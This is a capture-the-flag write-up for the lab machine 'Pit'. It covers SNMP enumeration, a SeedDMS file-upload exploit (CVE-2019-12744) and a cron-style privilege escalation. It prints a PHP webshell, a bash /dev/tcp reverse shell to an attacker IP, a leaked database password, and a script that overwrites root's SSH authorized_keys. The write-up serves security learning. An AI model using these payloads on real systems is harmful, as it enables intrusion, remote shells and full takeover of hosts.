Pit
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.241 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Wed Apr 19 07:41:35 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.051s latency).
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
# Nmap done at Wed Apr 19 07:42:01 2023 -- 1 IP address (1 host up) scanned in 26.49 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,9090 10.10.10.241 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Apr 19 07:43:17 2023 as: nmap -sCV -p22,80,9090 -Pn -n -oN targeted 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6fc3408f6950695a57d79c4e7b1b9496 (RSA)
| 256 c26ff8aba12083d160abcf632dc865b7 (ECDSA)
|_ 256 6b656ca692e5cc76175a2f9ae750c350 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.93%T=SSL%I=7%D=4/19%Time=643F9BD8%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 19 07:46:30 2023 -- 1 IP address (1 host up) scanned in 192.83 secondsAs seen in the nmap report, there is one domain called dms-pit.htb. Let's add it to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.241 dms-pit.htbThe website on port 80 shows the default nginx page.
There is a CentOS Linux login page on port 9090, but we don't have credentials.
The dms-pit.htb domain shows a different website with a 403 status code, which means that there is virtual hosting taking place on the server.
One thing that we have missed, is UDP ports. There is one service called SNMP which is exposed through the UDP 161 port.
nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.241
-pscan specific port.-sUUDP scan.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into file, in this case the udpScan file.
# Nmap 7.93 scan initiated Wed Apr 19 11:58:47 2023 as: nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.241
Warning: 10.10.10.241 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.241
Host is up (0.16s latency).
Not shown: 65458 open|filtered udp ports (no-response), 76 filtered udp ports (admin-prohibited)
PORT STATE SERVICE
161/udp open snmp
# Nmap done at Wed Apr 19 12:00:00 2023 -- 1 IP address (1 host up) scanned in 72.96 secondsTo enumerate the SNMP service, it is needed to install the MIBS package, and comment the mibs line in the /etc/snmp/snmp.conf file.
apt-get install snmp-mibs-downloader
nano /etc/snmp/snmp.conf
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :
# If you want to globally change where snmp libraries, commands and daemons
# look for MIBS, change the line below. Note you can set this for individual
# tools with the -M option or MIBDIRS environment variable.
#
# mibdirs /usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietfSometimes, we can get useful information from the SNMP service. In this case, using snmpwalk we'll see the path /var/www/html/seeddms51x/seeddms, and the /usr/bin/monitor binary being executed, which shows the user michelle.
snmpwalk -v 2c -c public 10.10.10.241 1
-vspecifies SNMP version to use.-cset the community string.1set OID.
...
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
...
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
...
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *Exploitation
The http://dms-pit.htb/seeddms51x/seeddms website shows a SeedDMS login page. We could try to log in with the username and password michelle.
These credentials work and we'll see that there are one folder called Docs, and a file called Upgrade Note inside.
Let's search for any common vulnerabilities of SeedDMS.
searchsploit seeddms
--------------------------------------------------------------- ---------------------
Exploit Title | Path
--------------------------------------------------------------- ---------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) Authenticated | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
-------------------------------------------------------------- ----------------------
Shellcodes: No ResultsLet's check the one called SeedDMS versions < 5.1.11 - Remote Command Execution.
searchsploit -x php/webapps/47022.txt
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]
Exploit Steps:
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
PHP Backdoor Code:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.Apparently, there is a way to get RCE by uploading a webshell. Let's follow the steps. First, go to the Docs folder.
Then, access the Users folder.
Go to the Michelle folder, where we should see the option to add a new document.
Create a simple PHP webshell.
nano pwn.php
<?php system($_GET["cmd"]);?>Add a new document, and upload the pwn.php webshell.
Once the webshell is uploaded, if we hover over the file, we'll see that it has the documentid 29.
Now, if we access the following URL, we'll be able to run commands on the server, and list the /etc/passwd file.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat+/etc/passwd
Time to get a shell. First, set a netcat listener on port 4444 using rlwrap.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, send a reverse shell using the webshell we just uploaded.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.5/4444 0>%261"
Listening on 0.0.0.0 4444
Connection received on 10.10.10.241 33014
bash: cannot set terminal process group (4268): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ whoami
whoami
nginxPrivilege Escalation
There is one conf directory in /var/www/html/seeddms51x/ with a file called settings.xml.
ls -l /var/www/html/seeddms51x/conf
total 36
-r--------. 1 nginx nginx 11933 Apr 21 2020 settings.xml
-rw-r--r--. 1 nginx nginx 13771 Mar 14 2018 settings.xml.template
-rw-r--r--. 1 nginx nginx 4247 Feb 20 2013 stopwords.txtThe settings.xml file contains credentials for a MySQL database.
cat /var/www/html/seeddms51x/conf/settings.xml
...
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
...We could try to log in as the user michelle, and the password we just found in the login page from https://dms-pit.htb:9090.
The login is successful.
Note that there is one section called Terminal, where there is a webshell as michelle. We could grab the user flag.
Let's investigate what is exactly /usr/bin/monitor.
cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
doneIt is running every bash script located in /usr/local/monitoring/ which name starts with check and ends with sh. Let's see what privileges we have on that directory.
getfacl /usr/local/monitoring/
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---We have permission to create new files in that directory. We could create a new script named check_alfa8sa.sh, which will insert our public SSH key into the authorized_keys file. First, grab our public SSH key.
cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3...EmDKbTo50= root@alfa8saThen, create the check_alfa8sa.sh inside /usr/local/monitoring/ with the following code.
vi /usr/local/monitoring/check_alfa8sa.sh
#!/bin/bash
echo "ssh-rsa AAAAB3...EmDKbTo50= root@alfa8sa" > /root/.ssh/authorized_keysNow to trigger the script, we need to run snmpwalk again.
snmpwalk -v 2c -c public 10.10.10.241 1
-vspecifies SNMP version to use.-cset the community string.1set OID.
Now, we should be able to log in via SSH as root without any password. Then, all we have to do is reap the harvest and take the root flag.
ssh root@10.10.10.241
Web console: https://pit.htb:9090/
Last login: Thu Apr 20 04:38:40 2023 from 10.10.14.5
[root@pit ~]# whoami
root
[root@pit ~]# cat root.txt
d670f6f678082e3a03e5a0afc3efec9bLast updated
Was this helpful?